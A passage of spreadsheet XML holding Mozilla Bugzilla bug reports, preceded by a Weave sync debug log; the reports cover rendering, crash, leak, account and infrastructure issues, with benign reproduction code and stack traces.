2009-05-10 11:51:31	Service.Main         DEBUG	Event: weave:service:wipe-server:finish
2009-05-10 11:51:31	Service.Main         DEBUG	Uploading new metadata record
2009-05-10 11:51:31	Service.Main         DEBUG	Setting meta payload storage version to 0.3.2
2009-05-10 11:51:34	Net.Resource         DEBUG	PUT request for https://sj-weave01.services.mozilla.com/0.3/user/henrik/meta/global
2009-05-10 11:51:34	Net.Resource         DEBUG	PUT request successful (200)
2009-05-10 11:51:34	Service.Main         INFO	Server data wiped to ensure consistency after client upgrade ( -&gt; 0.3.2)
2009-05-10 11:51:34	PubKeyManager        TRACE	Importing record: https://sj-weave01.services.mozilla.com/0.3/user/henrik/keys/pubkey
2009-05-10 11:51:35	Net.Resource         DEBUG	GET request for https://sj-weave01.services.mozilla.com/0.3/user/henrik/keys/pubkey
2009-05-10 11:51:35	Net.Resource         DEBUG	GET request failed (404)
2009-05-10 11:51:35	Net.Resource         DEBUG	Error response: 
record not found
2009-05-10 11:51:35	PubKeyManager        DEBUG	Failed to import record: Could not GET resource https://sj-weave01.services.mozilla.com/0.3/user/henrik/keys/pubkey (404)
2009-05-10 11:51:35	Service.Main         DEBUG	Could not get public key
2009-05-10 11:51:35	PubKeyManager        DEBUG	Generating RSA keypair
2009-05-10 11:51:44	PubKeyManager        DEBUG	Generating RSA keypair... done
2009-05-10 11:51:45	Net.Resource         DEBUG	PUT request for https://sj-weave01.services.mozilla.com/0.3/user/henrik/keys/pubkey
2009-05-10 11:51:45	Net.Resource         DEBUG	PUT request successful (200)
2009-05-10 11:51:46	Net.Resource         DEBUG	PUT request for https://sj-weave01.services.mozilla.com/0.3/user/henrik/keys/privkey
2009-05-10 11:51:46	Net.Resource         DEBUG	PUT request successful (200)
2009-05-10 11:51:46	Service.Main         DEBUG	Refreshing client list
2009-05-10 11:51:46	Engine.Clients       DEBUG	Event: weave:engine:sync:start
2009-05-10 11:51:46	Engine.Clients       DEBUG	Ensuring server crypto records are there
2009-05-10 11:51:46	RecordMgr            TRACE	Importing record: https://sj-weave01.services.mozilla.com/0.3/user/henrik/crypto/clients
2009-05-10 11:51:47	Net.Resource         DEBUG	GET request for https://sj-weave01.services.mozilla.com/0.3/user/henrik/crypto/clients
2009-05-10 11:51:47	Net.Resource         DEBUG	GET request successful (200)
2009-05-10 11:51:47	Engine.Clients       INFO	First sync uploading all items
2009-05-10 11:51:47	ClientTracker        DEBUG	Clearing changed ID list
2009-05-10 11:51:47	ClientTracker        DEBUG	Saving json to disk: weave/changes/clients.json
2009-05-10 11:51:47	Engine.Clients       INFO	1 outgoing items pre-reconciliation
2009-05-10 11:51:47	Engine.Clients       DEBUG	Downloading &amp; applying server changes
2009-05-10 11:51:48	Collection           DEBUG	GET request for https://sj-weave01.services.mozilla.com/0.3/user/henrik/clients/?full=1&amp;sort=depthindex
2009-05-10 11:51:48	Collection           DEBUG	GET request successful (200)
2009-05-10 11:51:48	Store.Clients.Store  DEBUG	Updating client dcb7250b-49f1-4542-921e-1b21ac9bccbf
2009-05-10 11:51:48	Store.Clients.Store  DEBUG	Saving json to disk: weave/meta/clients.json
2009-05-10 11:51:48	Engine.Clients       INFO	Applied 1 records reconciled 0 records
2009-05-10 11:51:48	Engine.Clients       DEBUG	Preparing 1 outgoing records
2009-05-10 11:51:48	Engine.Clients       INFO	Uploading 1 records + 0 index/depth records)
2009-05-10 11:51:48	Collection           DEBUG	POST request for https://sj-weave01.services.mozilla.com/0.3/user/henrik/clients/
2009-05-10 11:51:48	Collection           DEBUG	POST request successful (200)
2009-05-10 11:51:48	ClientTracker        DEBUG	Clearing changed ID list
2009-05-10 11:51:48	ClientTracker        DEBUG	Saving json to disk: weave/changes/clients.json
2009-05-10 11:51:48	Engine.Clients       DEBUG	Finishing up sync
2009-05-10 11:51:48	Engine.Clients       DEBUG	Event: weave:engine:sync:finish
2009-05-10 11:51:48	Service.Main         INFO	Sync completed successfully
2009-05-10 11:51:48	Service.Main         DEBUG	Event: weave:service:sync:finish
2009-05-10 11:52:27	Service.Main         DEBUG	Event: weave:service:sync:start
2009-05-10 11:52:27	Service.Main         DEBUG	Fetching global metadata record
2009-05-10 11:52:27	RecordMgr            TRACE	Importing record: https://sj-weave01.services.mozilla.com/0.3/user/henrik/meta/global
2009-05-10 11:52:28	Net.Resource         DEBUG	GET request for https://sj-weave01.services.mozilla.com/0.3/user/henrik/meta/global
2009-05-10 11:52:28	Net.Resource         DEBUG	GET request successful (200)
2009-05-10 11:52:28	Service.Main         DEBUG	Min supported storage version is 0.3.2
2009-05-10 11:52:28	Service.Main         DEBUG	Remote storage version is 0.3.2
2009-05-10 11:52:28	PubKeyManager        TRACE	Importing record: https://sj-weave01.services.mozilla.com/0.3/user/henrik/keys/pubkey
2009-05-10 11:52:28	Net.Resource         DEBUG	GET request for https://sj-weave01.services.mozilla.com/0.3/user/henrik/keys/pubkey
2009-05-10 11:52:28	Net.Resource         DEBUG	GET request successful (200)
2009-05-10 11:52:28	PrivKeyManager       TRACE	Importing record: https://sj-weave01.services.mozilla.com/0.3/user/henrik/keys/privkey
2009-05-10 11:52:29	Net.Resource         DEBUG	GET request for https://sj-weave01.services.mozilla.com/0.3/user/henrik/keys/privkey
2009-05-10 11:52:29	Net.Resource         DEBUG	GET request successful (200)
2009-05-10 11:52:29	Service.Main         DEBUG	Refreshing client list
2009-05-10 11:52:29	Engine.Clients       DEBUG	Event: weave:engine:sync:start
2009-05-10 11:52:29	Engine.Clients       DEBUG	Ensuring server crypto records are there
2009-05-10 11:52:29	Engine.Clients       INFO	0 outgoing items pre-reconciliation
2009-05-10 11:52:29	Engine.Clients       DEBUG	Downloading &amp; applying server changes
2009-05-10 11:52:30	Collection           DEBUG	GET request for https://sj-weave01.services.mozilla.com/0.3/user/henrik/clients/?newer=1241949110&amp;modified=1241949110&amp;full=1&amp;sort=depthindex
2009-05-10 11:52:30	Collection           DEBUG	GET request successful (200)
2009-05-10 11:52:30	Engine.Clients       INFO	Applied 0 records reconciled 0 records
2009-05-10 11:52:30	Engine.Clients       DEBUG	Preparing 0 outgoing records
2009-05-10 11:52:30	ClientTracker        DEBUG	Clearing changed ID list
2009-05-10 11:52:30	ClientTracker        DEBUG	Saving json to disk: weave/changes/clients.json
2009-05-10 11:52:30	Engine.Clients       DEBUG	Finishing up sync
2009-05-10 11:52:30	Engine.Clients       DEBUG	Event: weave:engine:sync:finish
2009-05-10 11:52:30	Service.Main         INFO	Sync completed successfully
2009-05-10 11:52:30	Service.Main         DEBUG	Event: weave:service:sync:finish</t>
  </si>
  <si>
    <t>CORE-382383</t>
  </si>
  <si>
    <t>nsDocShell::LoadURI discards LOAD_FLAGS_FIRST_LOAD</t>
  </si>
  <si>
    <t>ConvertLoadTypeToDocShellLoadInfo doesn't like it but we need it later.  Patch coming.</t>
  </si>
  <si>
    <t>CAMINO_GRAVEYARD-342232</t>
  </si>
  <si>
    <t>Disable various menu items when window/tab contains binary content</t>
  </si>
  <si>
    <t>As a followup to bug 309132 we should disable various other menu items when binary content is being displayed.  Per IRC this should be:
Fill Form
all the Finds
Bigger/Smaller Text
Text Encoding
Copy and Select All</t>
  </si>
  <si>
    <t>MOZILLA.ORG-374451</t>
  </si>
  <si>
    <t>CVS account email change: igor.bukanov@gmail.com -&gt; igor@mir2.org</t>
  </si>
  <si>
    <t>For quite some time I use igor@mir2.org as my bugzilla email account and would like also change CVS account from igor.bukanov@gmail.com to igor@mir2.org as well so people would know instantly from the CVS log my bugzilla account. 
Plus if somebody sends me email I would get it faster as forwarding fromigor.bukanov@gmail.com introduces a delay (sometime up to many minutes) despite the fact (or perhaps due to!) that @mir2.org uses Google mail for domains.</t>
  </si>
  <si>
    <t>CORE-334602</t>
  </si>
  <si>
    <t>[FIX]ASSERTION: Reparenting something that has no usable parent? Shouldn't happen!: 'Not Reached'</t>
  </si>
  <si>
    <t>See upcoming testcase which gives this assertion in current trunk build.
Basically it is these styles rules that cause the assertion:
html::first-line { }
html::before { content:This should not give an assertion in Mozilla}
This assertion was added with the fix for bug 322348.</t>
  </si>
  <si>
    <t>CORE_GRAVEYARD-385106</t>
  </si>
  <si>
    <t>design + implement actual register{ContentProtocol}Handler dialogs</t>
  </si>
  <si>
    <t>This is the UI (dialog box?) to allow arbitrary sites to register content and protocol handlers.  The existing feeds code uses a notification bar for this purpose.</t>
  </si>
  <si>
    <t>CORE_GRAVEYARD-299379</t>
  </si>
  <si>
    <t>DOMFocusIn/DOMFocusOut not working properly</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Windows U Windows NT 5.1 en-US rv:1.7.8) Gecko/20050509 Firefox/1.0.4
Build Identifier: Mozilla/5.0 (Windows U Windows NT 5.1 en-US rv:1.7.8) Gecko/20050509 Firefox/1.0.4
The DOMFocusIn and DOMFocusOut events should be caught when a value is changed
for a form control that traps for them but it doesn't.  See testcase.
Reproducible: Always</t>
  </si>
  <si>
    <t>FIREFOX-473156</t>
  </si>
  <si>
    <t>FUEL: fuelIEvents.removeListener removes all listeners for an event.</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Macintosh U Intel Mac OS X 10.5 en-US rv:1.9.0.5) Gecko/2008120121 Firefox/3.0.5
Build Identifier: Mozilla/5.0 (Macintosh U Intel Mac OS X 10.5 en-US rv:1.9.0.5) Gecko/2008120121 Firefox/3.0.5
fuelIEvents.removeListener removes all listeners for an event. 
For example if i add two different listeners of same event and then try to remove one of them second listener will be removed too.
Reproducible: Always
Steps to Reproduce:
I wrote example code:
var listener1 = {
    handleEvent: function(event) {
	Application.console.log('1: ' + event.type + ' - ' + event.data)
    }
}
var listener2 = {
    handleEvent: function(event) {
	Application.console.log('2: ' + event.type + ' - ' + event.data)
    }
}
Application.prefs.events.addListener('change' listener1)
Application.prefs.setValue('test_pref' 'true')
Application.prefs.events.addListener('change' listener2)
Application.prefs.setValue('test_pref' 'false')
Application.prefs.events.removeListener('change' listener1)
Application.prefs.setValue('test_pref' 'true')
Application.prefs.events.removeListener('change' listener2)
Actual Results:  
After running this code I see in console three lines:
1: change - test_pref
 ----------
1: change - test_pref
 ----------
2: change - test_pref
Expected Results:  
But I expected to see four lines last from listener 2:
1: change - test_pref
 ----------
1: change - test_pref
 ----------
2: change - test_pref
 ----------
2: change - test_pref
I think problem is in filter function in removeListener method.
This function:
function hasFilter(element) {
    return element.event != aEvent 
}
in fuelApplication.js will be return false for all listeners of aEvent.</t>
  </si>
  <si>
    <t>v.obishchenko</t>
  </si>
  <si>
    <t>CALENDAR-305577</t>
  </si>
  <si>
    <t>lightning prefs tab has 8 icons</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Macintosh U PPC Mac OS X Mach-O en-US rv:1.7.8) Gecko/20050511 Firefox/1.0.4
Build Identifier: Mozilla/5.0 (Macintosh U PPC Mac OS X Mach-O en-US rv:1.7.8) Gecko/20050511 Firefox/1.0.4
i compiled lightning on mac osx 10.4.2
installed tbird nightly from 8/21
installed lightning extension
go to tbird prefs
the lightning prefs area is a single clickable area w/ 8 icons (see screenshot url)
http://dietrich.ganx4.com/images/osx_lightning_prefs_bug.png
Reproducible: Always
Steps to Reproduce:
i compiled lightning on mac osx 10.4.2
installed tbird nightly from 8/21
installed lightning extension
go to tbird prefs
Actual Results:  
the lightning prefs area is a single clickable area w/ 8 icons
Expected Results:  
lightning prefs should not cover the other 7 icons</t>
  </si>
  <si>
    <t>CLOUD_SERVICES-475959</t>
  </si>
  <si>
    <t>Modal status dialog is resizable during a manual sync</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Macintosh U Intel Mac OS X 10.5 en-US rv:1.9.0.5) Gecko/2008120121 Firefox/3.0.5 Ubiquity/0.1.5
Build Identifier: Weave 0.2.99
When manually syncing the modal status dialog that popsup can be resized to non-proportional dimensions.
Reproducible: Always
Steps to Reproduce:
1. Select 'sync now'
2. When the modal status dialog popsup resize the box so that it's extremely narrow
Actual Results:  
The status dialog window can be made smaller than the contents it displays.
Expected Results:  
The status dialog should not be able to be resized (or if it can be resized it should scale proportionally).</t>
  </si>
  <si>
    <t>daniel.raffel</t>
  </si>
  <si>
    <t>CORE_GRAVEYARD-377241</t>
  </si>
  <si>
    <t>2007 Google Summer of Code (SoC) &amp; Mozilla Summer Projects</t>
  </si>
  <si>
    <t>Tracking bug for Summer of code projects and internships</t>
  </si>
  <si>
    <t>CORE-299603</t>
  </si>
  <si>
    <t>Use IM specified style for preedit string (It is better to use PANGO_ATTR_BACKGROUND for XIMReverse)</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (X11 Linux i686 U) Gecko/20050527 Kazehakase/0.2.7
Build Identifier: Mozilla/5.0 (X11 Linux i686 U) Gecko/20050527 Kazehakase/0.2.7
If gtk_immodule sets the text foreground color in preediting text Gecko makes
the text reversed (i.e. NS_TEXTRANGE_SELECTEDCONVERTEDTEXT or
NS_TEXTRANGE_SELECTEDRAWTEXT).
But I think the foreground color is set for improving visibility rather than
background color so it's better to use PANGO_ATTR_BACKGROUND for figuring out
XIMReverse condition.
Reproducible: Always</t>
  </si>
  <si>
    <t>THUNDERBIRD-231541</t>
  </si>
  <si>
    <t>Leave messages on server should be chosen by default (dataloss)</t>
  </si>
  <si>
    <t>The current default setting could cause loss of data because the user could be
expecting emails to be left on the server when they install Thunderbird then
remove the program and lose their emails.
Expected:
In account settings of a new account in the Server settings tab Leave
messages on server and Until I delete them or move them from Inbox should be
checked.
Actual:
Leave messages on server is unchecked
This should be a simple modification of the default preferences js file right?</t>
  </si>
  <si>
    <t>CORE-229705</t>
  </si>
  <si>
    <t>CStringArray methods should accept nsACString&amp; instead of nsCString&amp;</t>
  </si>
  <si>
    <t>While working on bug 229032 I found that CStringArray::CStringAt only accepts
nsCString&amp; as out parameter while StringArray::StringAt accepts nsAString&amp;. I
don't see any reason for this disparity. Fix coming up.</t>
  </si>
  <si>
    <t>MOZILLA.ORG_GRAVEYARD-563769</t>
  </si>
  <si>
    <t>powerdns WRR &amp; Geo deploy</t>
  </si>
  <si>
    <t>Tracking.</t>
  </si>
  <si>
    <t>SEAMONKEY-323508</t>
  </si>
  <si>
    <t>Favicon (error icon) in Bookmark not updated</t>
  </si>
  <si>
    <t>Hi!
Most likely a dupe but I don't find it. It appears in Mozilla/5.0 (Windows U Win98 en-US rv:1.8) Gecko/20051219 SeaMonkey/1.0b and previous versions.
I have a bookmark for a group of tabs. When I created it some icons where available which changed in the meantime. In particular one page did not load and had the warning symbol (exclamation point in yellow triangle). Those icons were saved and are displayed in the bookmark manager.
Now icons changed in particular the one with the warning. They are always displayed correctly in the tabs when I call the bookmark. The icons shown in the bookmark manager are never updated though. There also seems to be no way of manually updating.
pi</t>
  </si>
  <si>
    <t>3.14</t>
  </si>
  <si>
    <t>SEAMONKEY-320433</t>
  </si>
  <si>
    <t>Talkback option should be removed from build until we can build TB again.</t>
  </si>
  <si>
    <t>[Mozilla/5.0 (Windows U Win98 en-US rv:1.8) Gecko/20051214 SeaMonkey/1.0b] (nightly) (W98SE)
We don't currently have (Mozilla Fondation) tinderboxen so we don't have TalkBack included builds.
Yet the option is still present in Custom installer option and adds a few hundred kilobytes to the count when enabled :-(
Of course no TB is installed at all.</t>
  </si>
  <si>
    <t>CALENDAR-322859</t>
  </si>
  <si>
    <t>ORGANIZER property lost on roundtrip</t>
  </si>
  <si>
    <t>Testcase from Oracle coming.  Relevant line: ORGANIZERX-ORACLE-GUID=07FC24E37F265815E0405794071A700CCN=Simon Vaillan
 court:mailto:simon.vaillancourt@oracl1.com</t>
  </si>
  <si>
    <t>CORE-388995</t>
  </si>
  <si>
    <t>popup showing and hiding issues</t>
  </si>
  <si>
    <t>This bug is about ensuring that the showing and hiding of popups works without getting into a funky state. I've found a couple of issues while creating popup tests.
When &lt;menupopup onpopuphiding=event.preventDefault() is used the popup is supposed to be prevented from being hidden. That works but the popup then gets into a state where it can't be hidden if preventDefault isn't called on a later attempt to hide it or the popup can't be shown again. Also the event shouldn't be cancellable for content popups.
This is because for some reason I don't understand I wrote nsXULPopupManager::HidePopup to remove the popup from the open popups list before the popuphiding event when it should really be removed afterwards.
The 'is a popup open' checks needs to be a bit better. I think four states are needed: closed showing open and hiding.</t>
  </si>
  <si>
    <t>CALENDAR-295214</t>
  </si>
  <si>
    <t>'Hide Completed Tasks' does not work (trunk)</t>
  </si>
  <si>
    <t>Choosing 'Hide Completed Tasks' has no noticable effect on the tasks list.  This
includes after forcing a screen-redraw or even restarting.</t>
  </si>
  <si>
    <t>MARKETING-901674</t>
  </si>
  <si>
    <t>September 2013 Social Graphics Batch 3</t>
  </si>
  <si>
    <t>&gt;&gt;Project/Request Title:
September 2013 Social Graphics Batch 3
&gt;&gt;Project Overview:
To support September social posts and increase engagement. 
1) 303 tabs - All locales - 
we have a user quote about how great Firefox is with a hashtag #DoingItRight Perhaps we show lots of tabs? or we do it in a thought bubble? 
303 tabs currently open in my Firefox. Still working great as ever. - Firefox fan Siddharth A. (firefox logo) #DoingItRight
2) No One Ever - all locales - same style as others. Unsure of imagery. Ideas?
I want my browser to share my Web habits without my consent. ~said no one ever.
3) EN only - talk like a pirate day. Can we have a graphic that says Arrr you using Firefox with a pirate? 
The status update (text for reference not for graphic) is Ahoy land lubbers! Avast! Hoist the mizzen mast splice the mainbrace andâ€¦ other such things. Tell us your favorite things about Firefox in your best pirate tongue for
Talk Like a Pirate Day!
4) Far out graphic. We want to do a similar optical illusion graphic with the logo in the center to this https://www.facebook.com/photo.php?fbid=10151736237929653&amp;set=a.124804629652.101377.114998944652&amp;type=1&amp;theater
5) Tell your friends - all locales
this is a desktop share graphic. Text for graphic If you think Firefox is the best browser click like or share.
PS: I am making these all due in August because I'm out for 2 weeks in September and I need to have all these in the social calendar for scheduling while I'm out. But we're entering the early early so that you can plan for it.
&gt;&gt;Creative Specs &amp; Deliverables:
403x403 jpg localized when needed
&gt;&gt;Launch Date:
2013-09-11
&gt;&gt;Creative Due Date:
2013-08-28
&gt;&gt;Mozilla Goal:
All
&gt;&gt;Points of Contact:
mthayer@mozilla.com</t>
  </si>
  <si>
    <t>ccollins</t>
  </si>
  <si>
    <t>MOZILLA.ORG_GRAVEYARD-337640</t>
  </si>
  <si>
    <t>Add more redirects for Google extensions</t>
  </si>
  <si>
    <t>We're adding two new extensions and breaking toolbar into three separate per-platform builds to get the size of that XPI down.  To support these releases we'd like to set up redirectors like the others already in this directory. 
I'll attach the html files we need uploaded in that the google directory on addons.mozilla.org</t>
  </si>
  <si>
    <t>brianr</t>
  </si>
  <si>
    <t>CORE-721744</t>
  </si>
  <si>
    <t>configure: error: mozilla/js/src/ctypes/libffi/configure failed for ctypes/libffi</t>
  </si>
  <si>
    <t>Created attachment 592128
config.log
On Mac OS X 10.5 with the default gcc 4.2 configure fails in js due to 719659
...
checking whether the C compiler works... no
configure: error: in `/work/mozilla/builds/nightly/mozilla/firefox-debug/js/src/ctypes/libffi':
configure: error: C compiler cannot create executables
See `config.log' for more details.
configure: error: /work/mozilla/builds/nightly/mozilla/js/src/ctypes/libffi/configure failed for ctypes/libffi
configure: error: /work/mozilla/builds/nightly/mozilla/js/src/configure failed for js/src
...</t>
  </si>
  <si>
    <t>WEBSITES-399116</t>
  </si>
  <si>
    <t xml:space="preserve">Ignore Justin's Blog's </t>
  </si>
  <si>
    <t>Along the lines of bug 395063 comment 7 http://weblogs.mozillazine.org/justin/atom.xml looks like it changes the value of  at times other than when it should (when the author feels that a substantial update has been made not just a typo corrected) so even though http://weblogs.mozillazine.org/justin/2007/10/go_go_gadget_funnelcake.html was published on October 4 it's sitting in the midst of October 8.
Unless Justin says he really did make a substantive change and intended it to be republished with a new date looks like another candidate for |ignore_in_feed: updated|</t>
  </si>
  <si>
    <t>BUGZILLA.MOZILLA.ORG-450348</t>
  </si>
  <si>
    <t>Make clone this bug optionally keep same product and avoid product chooser</t>
  </si>
  <si>
    <t>Spun off of bug 355285 wherein several of us wanted to clone to you know clone a bug rather than dropping you back to the product chooser every time you wanted to clone a bug.  Bugzilla devs indicate that requiring you to choose a product every time you want to clone a bug is the intended behavior.
---
From bug 355285 comment 0:
my definition of clone includes retaining the classification product
component and assignee/qa.
the reason i make a clone is so that i don't have to search for the
product/component/assignee/qa. if i wanted to file a new bug i'd have gone off
and filed a new bug.
the cloning we use involves changing basically a flag which basically indicates
a different branch.
steps:
1. file a bug in foopy/newpie/boopy against: assi:yippie qa:darpy with summary
peppy and comment hipp-hipp-horrip
2. click clone
expected results:
bug is prefilled with foopy/newpie/boopy against: assi:yippie qa:darpy with
summary peppy and comment hipp-hipp-horrip
actual results (in a heavily customized bugzilla):
product chooser!
---
From bug 355285 comment 9:
Yes I would expect clone to keep the component etc. That's the hardest part to
fill out.  My use case was that I needed to file a new bug for a similar task
and wasn't sure how to fill it out.  I found an old one that was correct and
hit clone.  *If* someone wants to file in a different component I think it's
just as trivial to *change* component as it is to pick one from scratch.
---
There are other comments in bug 355285 from users of other Bugzillas indicating other reasons why having clone clone without requiring a trip to the product chooser is desirable but I've just copied these two from regular bmo users.
The good people at Eclipse have attached a patch to bug 355285 (attachment 322247) that makes clone behave sanely since there is a patch there filing this bug against bmo to see about taking a local customization to fix cloning.</t>
  </si>
  <si>
    <t>MOZILLA.ORG-396216</t>
  </si>
  <si>
    <t xml:space="preserve">CVS Account Request - Martin SchrÃ¶der </t>
  </si>
  <si>
    <t>Created attachment 280931
ssh public key
I'd like to have CVS write access for Calendar. No super-review is needed for this AFAIK.</t>
  </si>
  <si>
    <t>CORE-325526</t>
  </si>
  <si>
    <t>XML: Shared AnyName prototype object causes threads to block</t>
  </si>
  <si>
    <t>The shared AnyName prototype object stored in the JSRuntime does not seem to be correctly prepared for multithreading. Most often threads hang during JS_InitStandardClasses() inside the call to js_InitAnyNameClass().
Brendan already sent me a patch but my current code base is too old. I will test the patch as soon as I had the chance to update the code base.</t>
  </si>
  <si>
    <t>SEAMONKEY-255465</t>
  </si>
  <si>
    <t>Ctrl+= should enlarge text in Help viewer</t>
  </si>
  <si>
    <t>The problem's simple: in the Help viewer pressing Ctrl+(plus key on qwerty
section of keyboard) doesn't work while pressing Ctrl+(plus key on NumPad)
works.  Why?  The plus key on the qwerty section isn't really the plus key --
it's the equals (=) key.  Test it -- Ctrl+Shift+= will enlarge the text.
Firefox and Seamonkey have known about this problem for a while so they've
added a second  element that takes care of the = problem.  Patch coming up
to do the same for Help...note also that it's a l10n change because I have to
add = as an entity so it needs to get in before PR1.0.</t>
  </si>
  <si>
    <t>WWW.MOZILLA.ORG-289428</t>
  </si>
  <si>
    <t>Better link to Creating XPCOM components</t>
  </si>
  <si>
    <t>I have discovered that there is an summary page for the Creating XPCOM
components book where you can choose also other formats than HTML (pdf etc...).
In my opinion it would be better to link to this page than to the html version
directly from the embedding index page.
I have attached the generated diff file to this bugzilla report.</t>
  </si>
  <si>
    <t>fionn_bugzilla</t>
  </si>
  <si>
    <t>CORE-499570</t>
  </si>
  <si>
    <t>Leak JSNativeEnumerator [@ js_Enumerate] with Iterator({x:1})</t>
  </si>
  <si>
    <t>rtleak.js:
    Iterator({x:1})
valgrind 
    --num-callers=40 
    --auto-run-dsymutil=yes 
    --leak-check=full 
    ~/tracemonkey/js/src/debug/js
    rtleak.js
20 bytes in 1 blocks are definitely lost in loss record 29 of 107
   at 0x271516: malloc (vg_replace_malloc.c:193)
   by 0x222B6: JS_malloc (jsapi.cpp:1839)
   by 0xB3F4F: js_Enumerate (jsobj.cpp:4938)
   by 0x9E040: InitNativeIterator(JSContext* JSObject* JSObject* unsigned int) (jsiter.cpp:150)
   by 0x9E8CE: js_ValueToIterator (jsiter.cpp:398)
   by 0x9EAD5: Iterator(JSContext* JSObject* unsigned int long* long*) (jsiter.cpp:192)
   by 0x9C8E5: js_Invoke (jsinterp.cpp:1380)
   by 0x86F37: js_Interpret (jsinterp.cpp:5209)
   by 0x9B29E: js_Execute (jsinterp.cpp:1629)
   by 0x1E51B: JS_ExecuteScript (jsapi.cpp:5046)
   by 0x8474: Process(JSContext* JSObject* char* int) (shell/js.cpp:412)
   by 0x9CA9: ProcessArgs(JSContext* JSObject* char** int) (shell/js.cpp:820)
   by 0xB153: main (shell/js.cpp:4765)
To install Valgrind on Mac: http://blog.mozilla.com/nnethercote/2009/05/28/mac-os-x-now-supported-on-the-valgrind-trunk/</t>
  </si>
  <si>
    <t>TOOLKIT-427826</t>
  </si>
  <si>
    <t>Google Fastfind Toolbar does not accept return/enter keystroke</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Macintosh U Intel Mac OS X 10.5 en-US rv:1.9pre) Gecko/2008040104 Minefield/3.0pre
Build Identifier: Mozilla/5.0 (Macintosh U Intel Mac OS X 10.5 en-US rv:1.9pre) Gecko/2008040104 Minefield/3.0pre
The Google toolbar does not automatically search after striking the return/enter key as it did in every other beta build. This bug seems restricted to OSX (i.e. does not occur on Windows Vista in FF3b5).
Reproducible: Always
Steps to Reproduce:
1. Open a new tab
2. Hit 'tab' or click on Google fastfind toolbar
3. Type search term into toolbar
4. Hit enter/return
Actual Results:  
Nothing happens.
Expected Results:  
Search should occur.</t>
  </si>
  <si>
    <t>hans.sprecher</t>
  </si>
  <si>
    <t>CORE-327655</t>
  </si>
  <si>
    <t>crash in nsViewManager::~nsViewManager during XPCOM shutdown</t>
  </si>
  <si>
    <t>The #1 trunk topcrash is currently in nsViewManager's destructor during XPCOM shutdown typically like:
 nsViewManager::~nsViewManager()	[/builds/tinderbox/Fx-Trunk/Linux_2.4.21-27.0.4.ELsmp_Depend/mozilla/view/src/nsViewManager.cpp  line 848] 
	 nsViewManager::Release()	[/builds/tinderbox/Fx-Trunk/Linux_2.4.21-27.0.4.ELsmp_Depend/mozilla/view/src/nsViewManager.cpp  line 288] 
	 nsEditor::~nsEditor()	[/builds/tinderbox/Fx-Trunk/Linux_2.4.21-27.0.4.ELsmp_Depend/mozilla/editor/libeditor/base/nsEditor.cpp  line 246] 
	 nsPlaintextEditor::~nsPlaintextEditor()	[/builds/tinderbox/Fx-Trunk/Linux_2.4.21-27.0.4.ELsmp_Depend/mozilla/editor/libeditor/text/nsPlaintextEditor.cpp  line 111] 
	 nsEditor::Release()	[/builds/tinderbox/Fx-Trunk/Linux_2.4.21-27.0.4.ELsmp_Depend/mozilla/editor/libeditor/base/nsEditor.cpp  line 248] 
	 XPCJSRuntime::GCCallback()	[/builds/tinderbox/Fx-Trunk/Linux_2.4.21-27.0.4.ELsmp_Depend/mozilla/js/src/xpconnect/src/xpcjsruntime.cpp  line 562] 
	 DOMGCCallback()	[/builds/tinderbox/Fx-Trunk/Linux_2.4.21-27.0.4.ELsmp_Depend/mozilla/dom/src/base/nsJSEnvironment.cpp  line 2205] 
	 js_GC()	[/builds/tinderbox/Fx-Trunk/Linux_2.4.21-27.0.4.ELsmp_Depend/mozilla/js/src/jsgc.c  line 2033] 
	 js_ForceGC()	[/builds/tinderbox/Fx-Trunk/Linux_2.4.21-27.0.4.ELsmp_Depend/mozilla/js/src/jsgc.c  line 1561] 
	 js_DestroyContext()	[/builds/tinderbox/Fx-Trunk/Linux_2.4.21-27.0.4.ELsmp_Depend/mozilla/js/src/jscntxt.c  line 283] 
	 JS_DestroyContext()	[/builds/tinderbox/Fx-Trunk/Linux_2.4.21-27.0.4.ELsmp_Depend/mozilla/js/src/jsapi.c  line 934] 
	 mozJSComponentLoader::UnloadModules()	[/builds/tinderbox/Fx-Trunk/Linux_2.4.21-27.0.4.ELsmp_Depend/mozilla/js/src/xpconnect/loader/mozJSComponentLoader.cpp  line 1174] 
	 mozJSComponentLoader::Observe()	[/builds/tinderbox/Fx-Trunk/Linux_2.4.21-27.0.4.ELsmp_Depend/mozilla/js/src/xpconnect/loader/mozJSComponentLoader.cpp  line 1197] 
	 NS_ShutdownXPCOM_P()	[/builds/tinderbox/Fx-Trunk/Linux_2.4.21-27.0.4.ELsmp_Depend/mozilla/xpcom/build/nsXPComInit.cpp  line 848] 
	 ScopedXPCOMStartup::~ScopedXPCOMStartup()	[/builds/tinderbox/Fx-Trunk/Linux_2.4.21-27.0.4.ELsmp_Depend/mozilla/toolkit/xre/nsAppRunner.cpp  line 556] 
	 XRE_main()	[/builds/tinderbox/Fx-Trunk/Linux_2.4.21-27.0.4.ELsmp_Depend/mozilla/toolkit/xre/nsAppRunner.cpp  line 848] 
	 main()	[/builds/tinderbox/Fx-Trunk/Linux_2.4.21-27.0.4.ELsmp_Depend/mozilla/browser/app/nsBrowserApp.cpp  line 62] 
My guess is that eventQueue is null but we already have all the relevant event queues why not just use them instead?</t>
  </si>
  <si>
    <t>MOZILLA.ORG-366610</t>
  </si>
  <si>
    <t>CVS copies required for bug 363491</t>
  </si>
  <si>
    <t>Created attachment 251113
Required cvs copies
There are some more xpfe files SeaMonkey wishes to copy to /suite as part of bug 363491. The copy file (attached) has already been reviewed there as attachment 250776.</t>
  </si>
  <si>
    <t>MOZILLA.ORG_GRAVEYARD-493181</t>
  </si>
  <si>
    <t>RelEng ESX outage</t>
  </si>
  <si>
    <t>At this point bm-vmware03 and 12 are not responding in the VI along with 16 VMs disconnected. Nagios is reporting all sorts of timeouts for the ESX hosts and ping fail for the VMs.
Nagios is also reporting that DHCP is down in the build network:
 v74boris:DHCP - bm-admin01 is CRITICAL: CRITICAL: No DHCPOFFERs were received.
which earns this blocker status.</t>
  </si>
  <si>
    <t>MOZILLA.ORG_GRAVEYARD-515412</t>
  </si>
  <si>
    <t>[AMO] Preview isn't updating L10n</t>
  </si>
  <si>
    <t>A string change was pushed 18 hours ago and hasn't shown up on preview.addons.mozilla.org.  Is preview updating recompiling .po files and restarting apache?
Example:
